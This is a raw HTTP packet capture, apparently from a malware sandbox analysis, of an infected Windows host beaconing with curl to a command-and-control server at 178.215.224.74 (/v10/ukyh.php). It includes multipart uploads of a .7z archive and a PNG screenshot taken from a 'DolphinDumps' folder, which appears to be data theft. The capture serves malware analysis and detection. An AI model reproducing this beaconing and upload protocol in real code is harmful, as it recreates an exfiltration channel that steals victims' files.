                                      Data Ascii: jspo=2014&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=TG1kdGowZHNSUTdiYjAyJzFGfk1USm5RaUZRfEx3JTNEJztGfE1UT3hORE8wT1RLMEVUVzFOakMyTGhPJTFGfk1RJTFMJzNEdE9DLTNGJzFGfmZqR39lV2glMEZkUkhXTm9uamJUQicwRncnMkJ1MUhrcENENDlXR2F6dG90ZW96OXlnMU1ReUJNO0NDREpp
                                      Nov 24, 2024 12:07:11.615094900 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:11 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8
                                      Nov 24, 2024 12:07:13.284379959 CET295OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 1701
                                      Cache-Control: no-cache
                                      Nov 24, 2024 12:07:13.284379959 CET1701OUTData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 41 7a 4f 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDAzOCpLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxMbWtjbFxHbW1nbGdcQ2hwb2VlXldzZXAgRmN2YV5ScG9maW5tIjFbSF8zOjcoOjM6KEE6Xl17Z3BzXmFsZm9uc15JcnBEYXZjXExtY2FsXkdnb2VuZVxBaHBtb2VeV3FlciBGaXZhXFhwbW5pbmciMF
                                      Nov 24, 2024 12:07:13.717500925 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:13 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8
                                      Nov 24, 2024 12:07:15.469031096 CET425OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 131
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 39 76 65 6d 74 73 62 47 46 65 52 6d 46 79 5a 32 52 76 65 46 35 62 51 6c 38 25 33 44
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkzMCpLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXk9vemtsbGFeRmFyZ2RveF5bQl8%3D
                                      Nov 24, 2024 12:07:15.890384912 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:15 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8
                                      Nov 24, 2024 12:07:17.789242029 CET300OUTPOST /v10/ukyh.php?uvyw=6 HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----974767299852498929531610575
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 29950
                                      Cache-Control: no-cache
                                      Nov 24, 2024 12:07:17.789242029 CET14832OUTData Raw: 2d 2d 2d 2d 2d 2d 39 37 34 37 36 37 32 39 39 38 35 32 34 39 38 39 32 39 35 33 31 36 31 30 35 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69
                                      Data Ascii: ------974767299852498929531610575Content-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Roaming\DolphinDumps\4CA966315CCC70F4BEF0FE322EDE46_ff.7z"Content-Type: application/octet-stream7z'h{s$
                                      Nov 24, 2024 12:07:17.910171032 CET13596OUTData Raw: 7b d8 de eb 7f 28 50 61 ae 09 1d 30 59 db 61 30 d7 80 f8 83 3b a6 0c ea 9f 81 d8 a0 80 fe a0 20 dc eb b7 98 24 06 83 59 62 29 4f 65 0b 70 b7 fc c6 dd 7c be b6 9f cf ef f4 24 7f 8a 3c 2c ca bd 80 7b fb 70 3b 57 db c3 39 0c a3 58 88 1e a0 52 9e 8f
                                      Data Ascii: {(Pa0Ya0; $Yb)Oep|$<,{p;W9XRNKh$(zO}IuUX@i3"WE|2O1)'3H~R)Eu{J-9J*Eht&%(S}!NDqJU$z3
                                      Nov 24, 2024 12:07:17.910305023 CET1522OUTData Raw: 63 f6 3b 53 1e 44 ff 43 af 0c c8 cd b7 05 33 66 bb 33 05 f8 73 36 c1 1e 5d 8a ab 19 0a 00 fa 17 38 35 6c e5 43 27 9f 2b b2 3b 22 93 79 61 53 01 57 0e 77 c4 5c e2 29 a3 30 13 d2 91 89 e0 a1 20 cc fc 41 5f 86 db c0 08 7b 3b d9 ce 97 bb fc 1a a1 64
                                      Data Ascii: c;SDC3f3s6]85lC'+;"yaSWw\)0 A_{;d8_e:HPje=w4{8fK?V@m+?h/.tr=!l"5a#8w37>Ki0st_)k lb %,H*{{fvB8#StE
                                      Nov 24, 2024 12:07:18.519817114 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:17 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      84192.168.2.550062178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:11.909528017 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:13.269902945 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:13 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      85192.168.2.550063178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:12.136986017 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:13.487483978 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:13 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      86192.168.2.550064178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:13.720417976 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:15.038777113 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:14 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      87192.168.2.550065178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:14.160656929 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:15.417066097 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:15 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      88192.168.2.550066178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:15.676050901 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:16.935607910 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:16 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      89192.168.2.550067178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:16.463442087 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:17.777966976 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:17 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      90192.168.2.550068178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:17.184931040 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:18.531554937 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:18 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      91192.168.2.550069178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:18.705166101 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:20.016470909 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:19 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      92192.168.2.550070178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:19.123382092 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:20.475289106 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:20 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      93192.168.2.550071178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:20.241075993 CET176OUTGET /v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:21.555994987 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:21 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 74 72 75 65
                                      Data Ascii: true


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      94192.168.2.550072178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:20.671210051 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:21.983789921 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:21 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      95192.168.2.550073178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:21.796869993 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:23.066112995 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:22 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      96192.168.2.550074178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:22.678447008 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:23.992279053 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:23 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      97192.168.2.550075178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:23.249813080 CET143OUTGET /v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:25.674802065 CET204INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:24 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 5
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 66 61 6c 73 65
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      98192.168.2.550076178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:24.175582886 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:25.440396070 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:25 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      99192.168.2.550077178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:25.940613985 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:27.250803947 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:27 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      100192.168.2.550078178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:26.938750982 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:28.197444916 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:27 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      101192.168.2.550079178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:27.495776892 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:28.855890036 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:28 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      102192.168.2.550080178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:28.329150915 CET301OUTPOST /v10/ukyh.php?uvyw=2 HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----974767299852498929531610575
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 699317
                                      Cache-Control: no-cache
                                      Nov 24, 2024 12:07:28.329368114 CET11124OUTData Raw: 2d 2d 2d 2d 2d 2d 39 37 34 37 36 37 32 39 39 38 35 32 34 39 38 39 32 39 35 33 31 36 31 30 35 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69
                                      Data Ascii: ------974767299852498929531610575Content-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Roaming\DolphinDumps\4CA966315CCC70F4BEF0FE322EDE46.png"Content-Type: application/octet-streamPNGIHDR
                                      Nov 24, 2024 12:07:28.448957920 CET1236OUTData Raw: 4f 9d 7f 9c 9d 5e 04 c2 67 ec 74 6b 98 c0 e7 24 b9 a7 0e c0 98 db 21 7e 5f ba 10 d3 35 e0 5b 42 6d c6 8d d5 75 60 db f5 a7 39 34 13 80 7a 1b f0 e4 9d e2 cf b2 c3 82 34 f2 3c 40 2b 04 91 7c ba 1a 2c 21 a8 eb c2 8c 12 80 92 80 a9 63 6f eb f8 7d 8c
                                      Data Ascii: O^gtk$!~_5[Bmu`94z4<@+|,!co}HjI\>i_mg#]ZO0exN)RO1FBohdMOkr>D29Cm}knks{MW##%cvb&x:$$n@H?j)
                                      Nov 24, 2024 12:07:28.449192047 CET4944OUTData Raw: b4 65 3c 1f 21 54 ae 99 93 9f 3a 23 fe 1d 8b eb 81 cd e3 d9 31 27 69 e7 89 3d c9 bd 1c 09 3e 50 0d 92 10 58 73 2d 99 11 79 88 88 44 04 da 6e 43 9d 9d e6 9b df 12 06 36 8d 3f 6b 84 f9 84 2d e2 99 26 36 b8 d9 cd e1 8f 66 2c 0e 53 b6 8e ff f7 f7 99
                                      Data Ascii: e<!T:#1'i=>PXs-yDnC6?k-&6f,S:&n8gscN\(%QbQ01d_.+ltM!?C@$kC"ObO2PsM%> GM8CRpXOu>Bdma+
                                      Nov 24, 2024 12:07:28.449305058 CET2472OUTData Raw: 62 af 53 ac c0 b3 eb 71 01 38 8c 27 fb 3c 3c e9 67 a9 21 f3 24 fb ca 98 d6 e4 24 fe 86 38 8f 5c 8c d5 be fa 60 25 01 87 be f6 70 03 63 25 00 ed dc d2 4e 00 2a 27 a9 97 c7 6c 4e 7b ed 7a e2 97 1e 6c 60 42 dc 3b 14 e3 90 4b 3f 0f c9 3e db 35 a8 2e
                                      Data Ascii: bSq8'<<g!$$8\`%pc%N*'lN{zl`B;K?>5.A@?V|;.?S|>^kkn@<F+@2/_SgB?,FSw;1q$Et$$|xZaA`IglF~m!vY\I?N"O~ K?
                                      Nov 24, 2024 12:07:28.449331999 CET2472OUTData Raw: 56 00 52 9b e4 5e 26 00 1b 24 a0 11 72 56 f8 31 4a ee a9 c6 eb e6 cb 6b 80 b9 e0 aa af 95 7f 82 35 71 5d fd 45 00 4a da 21 f6 58 03 9d 7e 9a 23 f6 18 25 03 73 d9 07 8a 09 2b e5 72 10 73 56 fc 09 a4 9d 5e 0a a2 37 06 33 97 d4 63 af 6a f2 8e 3f 61
                                      Data Ascii: VR^&$rV1Jk5q]EJ!X~#%s+rsV^73cj?a?kSvJ$<H?[%1s\q\gHPNX!w9Dd]wS%XS#)=})V$T/N]G&n"O @k>a y:Kb$&HL)3iZ=g
                                      Nov 24, 2024 12:07:28.449357986 CET2472OUTData Raw: 47 d7 1f 02 50 92 ce ca 40 c5 54 ab 38 a3 b0 71 60 ad 39 70 86 ce 81 b4 af 94 77 ba 56 2b c1 c6 73 f6 78 f3 2e 73 90 94 13 79 1c 19 c7 5a 02 8f b5 95 7c ea 2a d4 5e 46 72 da a7 5a 49 3f c5 d4 f5 47 9d 3e 8b 9c 3a 0d f5 66 5e 09 3f e4 9e ba fc 98
                                      Data Ascii: GP@T8q`9pwV+sx.syZ|*^FrZI?G>:f^?+x9HZ:6.d!kAIAob3p/nx2uI}'"< gY~7?o~^(M/]Ew7W!+V[._guVx
                                      Nov 24, 2024 12:07:28.449435949 CET2472OUTData Raw: 1b f3 33 c4 7a 2b 28 25 fb 90 72 56 e2 09 f2 92 75 12 7b 92 7a 08 40 ea 85 15 87 a0 b9 3d 8f 75 12 7f 15 c4 a8 6b 84 38 4c e0 67 8e 63 7d 53 ba 10 e3 f7 2e a1 66 52 fc 1d 4c da 12 89 87 e4 a3 6b 30 fe 7c 71 1c da 0c 91 47 27 60 01 6b c5 06 3e 73
                                      Data Ascii: 3z+(%rVu{z@=uk8Lgc}S.fRLk0|qG'`k>smorwCD8k1I~e'5FWw]cT^{#3y?r% j;Do,% _Lr/F,MXtuS}yA-O)fy?iS{N
                                      Nov 24, 2024 12:07:28.449521065 CET2472OUTData Raw: 7b 24 00 75 5d 97 b9 95 7f ea e4 53 cc 8a 3f 46 d5 f0 ac 40 89 42 ed 51 b7 e0 e4 f8 bd 10 75 f9 33 fc 34 d7 35 5f 09 40 d5 da fa 5c fe 11 53 9d 15 7e 92 81 12 7e ac e9 f8 23 46 27 e0 06 fc 2e 63 4c f2 8f 9a da 00 e2 ef 27 ef 55 48 08 aa 2b b0 ea
                                      Data Ascii: {$u]S?F@BQu345_@\S~~#F'.cL'UH+]#$c W~8gx`z>O$~I{V,{w~z@a]l5]BoX?OOY<y9_+_H]y^Cm+FE
                                      Nov 24, 2024 12:07:28.571203947 CET9888OUTData Raw: 46 cb 29 a7 8e 8d 00 f4 c8 05 e0 21 e3 02 b0 2b c6 05 60 67 78 d2 cf 52 77 a5 9f 25 7e 8f 2e 19 17 80 eb 56 00 7a a2 af 19 de 7e 0f 4f fe 41 af 02 b0 1d 56 ee 79 ac 2f 02 d0 d2 10 2b cf 59 1f 05 20 78 52 af 1b 3c e9 67 b1 d2 6f f0 c0 b8 e7 03 22
                                      Data Ascii: F)!+`gxRw%~.Vz~OAVy/+Y xR<go";BCq-!%g8K@!fNvxfP1s^f S7{O8_Oy'>SY7qVb|iH,b]EY$$%Yy}i
                                      Nov 24, 2024 12:07:28.571259975 CET7416OUTData Raw: 20 ee 18 25 f6 6c 5c 28 06 12 7e cd 44 a1 ed f6 93 98 d3 1a 10 76 8c 12 80 cd ea 98 6b 6d 65 9f 3a 03 6d 4c 72 90 7a 75 f8 21 f9 24 f5 88 29 ee 89 41 d6 aa b7 62 4f 57 81 25 f8 24 03 3d 01 c8 58 5c 0f 2e c4 1f a4 ab bf 11 e4 1f 23 cf 03 9c b2 5b
                                      Data Ascii: %l\(~Dvkme:mLrzu!$)AbOW%$=X\.#[]?$w#P\BLHYlq(1Z{77:a$dPVh'c!VJ;5H{yk%l-p]}Ii`M18u;g/q`bL3\$lNi^>'aG
                                      Nov 24, 2024 12:07:30.913765907 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:29 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      103192.168.2.550081178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:29.702246904 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:30.976016998 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:30 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      104192.168.2.550082178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:31.156582117 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:32.508452892 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:32 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      105192.168.2.550083178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:31.224884033 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
